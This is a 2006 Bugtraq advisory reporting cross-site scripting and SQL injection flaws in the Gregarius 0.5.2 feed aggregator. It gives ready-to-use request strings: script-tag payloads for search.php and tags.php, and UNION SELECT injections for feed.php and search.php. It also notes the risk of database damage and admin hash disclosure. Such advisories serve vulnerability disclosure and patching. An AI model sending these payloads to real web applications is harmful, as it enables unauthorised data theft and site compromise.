Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities
From: tzitaroth@xxxxxxxxx
Date: 3 Mar 2006 13:29:55 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

http://gregarius.net/
Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your 
web server, allowing you to access your news sources from wherever you want. 

XSS in search.php:
search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact

XSS in tags.php:
tags.php?tag=<script>alert(1)</script>

SQL Injection in feed.php:
feed.php?folder=3 and 1=1 UNION select title from item--

with magic_quotes=off:
SQL Injection in search.php:
search.php?rss_query=aa%')) UNION select 
null,null,null,null,null,null,null,null,null,null,null,title,null from item-- 
&rss_query_match=exact


On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and 
possible local file disclosure due to not properly sanitized $lang include, on 
early 0.5.3 svn version to admin hash disclosure.
More XSS and SQL Injections in admin section.

Fixed in latest 0.5.3 svn.

Prev by Date: Gallery 2 Multiple Vulnerabilities
Next by Date: [eVuln] Skate Board Multimple Vulnerabilities
Previous by thread: Gallery 2 Multiple Vulnerabilities
Next by thread: [eVuln] Skate Board Multimple Vulnerabilities
Index(es):
- Date
- Thread